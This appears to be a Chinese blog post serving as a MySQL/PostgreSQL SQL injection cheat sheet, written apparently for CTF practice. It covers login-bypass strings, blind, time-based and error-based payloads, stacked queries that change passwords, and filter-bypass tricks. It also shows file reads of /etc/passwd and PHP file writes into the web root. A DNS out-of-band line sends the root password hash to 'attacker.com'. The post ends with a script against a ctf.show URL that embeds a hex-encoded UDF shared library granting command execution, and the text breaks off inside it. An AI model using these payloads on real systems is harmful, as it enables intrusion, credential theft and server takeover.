SQL注入

2020-05-16 web SQL, 注入 ∞ 评论

万能密码

admin' --
admin' #
admin'/\*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1-- 
1'^1#       (False注入)

手注

正常注入步骤（联合查询）

查库名->查表名->查列名（字段名）->查值（数据）

字段数量猜解
1
order by 4 --+
判断页面回显数据字段位置
1
union select 1,2,3,4,x... --+

数据库名

select database()
select schema_name from information_schema.schemata;

-- MySQL8新特性(>8.0.21)
table information_schema.TABLESPACES_EXTENSIONS

表名

1	union select 1,2,group_concat(table_name),4,xxxx from information_schema.tables where table_schema=database()

union查询

UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* 列出所有用户自定义数据库中的表 */

-- MySQL 4版本时用version=9，MySQL 5版本时用version=10
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;   /* 列出当前数据库中的表 */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';

盲注

AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

-- MySQL8新特性
and (table information_schema.TABLESPACES_EXTENSIONS limit 1,1)>(BINARY('a'),'0')#

报错

1
2

AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
-- 在5.1.5版本中成功。

列名（字段名）

Union select 1,2,group_concat(column_name),4,xxxx from information_schema.columns where table_schema=database() and table_name=(table_name) /*此处的表名为字符串型，也通过十六进制表示*/

union查询

1	UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

盲注

1	AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错

-- 在5.1.5版本中成功
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
-- MySQL 5.1版本修复了
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));

值查询

Union select 1,2,column_name,4,xxx from (database_name.)table_name

-- MySQL8新特性
and (table flag limit 1,1)>(BINARY('a'))#

无回显

盲注

布尔盲注

使用场景：对真/假条件返回的内容很容易区分。

(where | and) if(substr((select password from users where username='admin'),1,1)='a',1,0)

select * from users where username=nouser or length(database())>8
select * from users where username=nouser or ascii(substr(database(),1,1))<130

时间盲注

依赖于通过页面返回的延迟时间来判断条件是否正确。

通常可利用的产生时间延迟的函数有：sleep()、benchmark()，还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。

-- sleep()
(where | and) if(substr((select password from users where username='admin'),1,1)='a',sleep(3),1)

select * from users where username=$username (and | or) if(length(database())>8,sleep(3),1)

-- pg_sleep()
(and | or) (case when (select substr(password,1,1) from users)='a' then pg_sleep(5) else pg_sleep(0) end)

and (select case when(substr((select password from users where username='admin'),1,1)='a') then (select 'roarctf' from pg_sleep(3)) else '1' end)='roarctf'

-- 笛卡尔积 heavy query
select * from users where id=1 and 1>(select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C);
select * from users where id=1 and if(1,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0) and '1'='1';

报错注入

通过特殊函数的错误使用使其参数被页面输出。

前提：服务器开启报错信息返回，也就是发生错误时返回报错信息。

常见的利用函数有：exp()、floor()+rand()、updatexml()、extractvalue()等。

(where|and|or) exp(~(select * from(select user())a));
(where|and|or) pow(~(select * from(select user())a),9999);
(where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
(where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));

limit注入

使用 PROCEDURE函数进行注入，ANALYSE支持两个参数。

1
2
3

select id from users order by id desc limit 0,1 procedure analyse(1,1);
select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
select id from users order by id desc limit 0,1 into outfile "/var/www/html/1.php" LINES TERMINATED BY 0x16进制文件

update注入

1
2
3

#盲注
update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;

insert注入

1
2
3

#盲注
insert into users values (16,'K0rz3n','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));
insert into users values (15,'K0rz3n','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

order by注入

1 2	#报错注入 select * from users order by updatexml(1,concat(0x7e,(select%20user()),0x7e),1);

group by注入

1 2	#盲注 select * from users group by 1 having substr((select database()),1,1)='c'

宽字节注入
国内最常使用的 GBK 编码，这种方式主要是绕过 addslashes 等对特殊字符进行转移的绕过。反斜杠 \ 的十六进制为 %5c，在你输入 %bf%27 时，函数遇到单引号自动转移加入 \，此时变为 %bf%5c%27，%bf%5c 在 GBK 中变为一个宽字符「縗」。**%bf** 那个位置可以是 %81-%fe 中间的任何字符。不止在 SQL 注入中，宽字符注入在很多地方都可以应用。
GET方式：利用URLencode ?id=1%df'||1={payload}%23
POST方式：利用UTF-16或UTF-32或中文 ?id=1我'||1={payload}#

堆叠注入

由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下，可利用此方法执行其他恶意语句，如RENAME、DROP等。

1;show databases;#
1;show tables;#
1;show columns from [表名];#

1;update`ctfshow_user`set`pass`=(0x31323334)where(username=0x61646d696e)

/*预处理*/
1;PREPARE hacker from char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);EXECUTE hacker;#
1;PREPARE hacker from 0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;EXECUTE hacker;#

1';SET @sqli=char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);PREPARE hacker from @sqli;EXECUTE hacker;#
1';SET @sqli=0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;PREPARE hacker from @sqli;EXECUTE hacker;#

二次注入
攻击者构造的恶意数据存储到数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。
现在通常Web应用程序大多都会进行参数过滤，来防止注入。如果某处使用了urldecode()或者 rawurldecode()函数，则会导致二次解码生成单引号二引发注入，即二次注入。
Web应用程序通常使用addslashes() 、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC来防止注入，也就是给单引号(‘’)、双引号(“”)、反斜杠()和NULL加上反斜杠转义。
addslashes函数虽然在过滤之后会添加 “\” 进行转义，但是 “\” 并不会被带到数据库中
- 二次urldecode注入
  单引号：%25%27
  双引号：%25%22
文件操作
读文件：
SELECT LOAD_FILE('/etc/passwd')
SELECT LOAD_FILE(0x2f666c6167)
写文件：
SELECT '<?php phpinfo();?>' into outfile '/var/www/html/phpinfo.php'
select version() into outfile "/var/www/html/test.php" LINES TERMINATED BY 0x16进制文件

绕过（bypass）

空格
1. 多层括号嵌套
2. 改用+号
3. 使用注释代替（/*注释内容*/、/*! MYSQL专属*/）
4. and/or后面可以跟上偶数个!、~可以替代空格，也可以混合使用(规律又不同)，and/or前的空格可用省略
5. %09, %0a, %0b, %0c, %0d, %a0等部分不可见字符可也代替空格
单双引号
1. 需要跳出单引号的情况：尝试是否存在编码问题而产生的SQL注入。
2. 不需要跳出单引号的情况：字符串可用16进制表示、也可通过进制转换函数表示成其他进制。
1
2
3
4
-- hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E
-- char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
逗号
1. 采用 substr((database())from({})for(1)) 的形式
2. 采用join：union select * from ((select 1)a join (select 2)b join (select 3)c);
等号 / like
1. 用regexp或者in
2. <>
and / or
1. 双写anandd、oorr
2. 使用运算符代替&&、||
3. 直接拼接=号，如：?id=1=(condition)
4. 其他方法，如：?id=1^(condition)、?id=1)xor(condition)
union
1. 盲注：'and(select pass from users limit 1)='secret

select

有文件读取权限

1 2	' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+ length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt

获取列名

1
2
3

' and 列名 is not null#
' procedure analyse()#
'and substr(pass,1,1)='a  /*使用substr来做过滤条件*/

handler语句代替select查询

/*通过handler语句查询users表的内容*/
handler users open as yunensec; /*指定数据表进行载入并将返回句柄重命名*/
handler yunensec read first; /*读取指定表/句柄的首行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
...
handler yunensec close; /*关闭句柄*/

limit

1
2
3

'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))

where
1. join/left join/right join...on...
information_schema
1. 替代表：sys.x$schema_flattened_keys 、sys.schema_table_statistics
其他关键字
1. 双写绕过关键字过滤
2. 使用同义函数/语句代替，如if函数可用case when condition then 1 else 0 end语句代替。
3. 使用 CONCAT() 时，任何个参数为 null，将返回 null，推荐使用 CONCAT_WS()。CONCAT_WS()函数第一个参数表示用哪个字符间隔所查询的结果。
  1
  2
  3
  4
  SELECT 'a' 'd' 'mi' 'n';
  SELECT CONCAT('a', 'd', 'm', 'i', 'n');
  SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
  SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
括号
1. order by 大小比较盲注

数字

用true换1

1 2	def cal(x): return ('('+'(true)+'*x)[:-1]+')'

替换表

代替字符	数	代替字符	数	代替字符	数	数	代替字符
false、!pi()	0	ceil(pi()*pi())	10	A	ceil((pi()+pi())*pi())	20	K
true、!(!pi())	1	ceil(pi()*pi())+true	11	B	ceil(ceil(pi())*version())	21	L
true+true	2	ceil(pi()+pi()+version())	12	C	ceil(pi()*ceil(pi()+pi()))	22	M
floor(pi())、~~pi()	3	floor(pi()*pi()+pi())	13	D	ceil((pi()+ceil(pi()))*pi())	23	N
ceil(pi())	4	ceil(pi()*pi()+pi())	14	E	ceil(pi())*ceil(version())	24	O
floor(version()) //注意版本	5	ceil(pi()*pi()+version())	15	F	floor(pi()*(version()+pi()))	25	P
ceil(version())	6	floor(pi()*version())	16	G	floor(version()*version())	26	Q
ceil(pi()+pi())	7	ceil(pi()*version())	17	H	ceil(version()*version())	27	R
floor(version()+pi())	8	ceil(pi()*version())+true	18	I	ceil(pi()pi()pi()-pi())	28	S
floor(pi()*pi())	9	floor((pi()+pi())*pi())	19	J	floor(pi()pi()floor(pi()))	29	T

sys系统库

#查询所有的库：
SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;

#查询指定库的表（若无则说明此表从未被访问）：
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema='mspwd' GROUP BY table_name;
SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema='mspwd' GROUP BY table_name;

#统计所有访问过的表次数:库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

#查看所有正在连接的用户详细信息:连接的用户(连接的用户名,连接的ip),当前库,用户状态(Sleep就是空闲),现在在执行的sql语句,上一次执行的sql语句,已经建立连接的时间(秒)
SELECT user,db,command,current_statement,last_statement,time FROM sys.session;

#查看所有曾连接数据库的IP,总连接次数
SELECT host,total_connections FROM sys.host_summary;

#查看语句的执行记录
SELECT * from sys.x$statement_analysis;

mysql系统库

1 2	#查询指定库的表 select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()

无列名注入（or被过滤）

1
2
3

select group_concat(`2`) from (select 1,2,3 union select * from user)x;
select ((select 1,'ae',0)>(select * from user));
?id=-1' union all select * from (select * from users as a join users b using(id,username))c--+

参考文
https://xz.aliyun.com/t/7169

DNS带外注入（OOB）

out-of-band带外数据（OOB）与inband相反，它是一种通过其他传输方式来窃取数据的技术（例如利用DNS解析协议和电子邮件）。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求，然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则，即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器（DNS）中提取数据，则被认为是最隐蔽有效的方法。

利用原理：

利用条件：

需要Windows环境

1、DBMS中需要有可用的，能直接或间接引发DNS解析过程的子程序，即使用到UNC

2、Linux没有UNC路径，所以当处于Linux环境，不能使用该方式获取数据

工具：

DNSLog.cn

CEYE

#secure_file_priv指定文件夹或为空（没有设置）（mysql>5.5.53默认null，禁用导入导出）
#查询secure_file_priv
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

#注入
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
select load_file(concat(0x5c5c5c5c,(select database()),0x2E62383862306437653533326238663635333164322E642E7A6861636B2E63615C5C612E747874));

UDF

UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。当我们有读取和写入权限以后，我们就可以尝试使用UDF提权的方法，从数据库的root权限提升到系统的管理员权限。

参考：Mysql UDF 提权

#参考脚本
#环境：Linux/MariaDB
import requests

url='http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D0070000000000000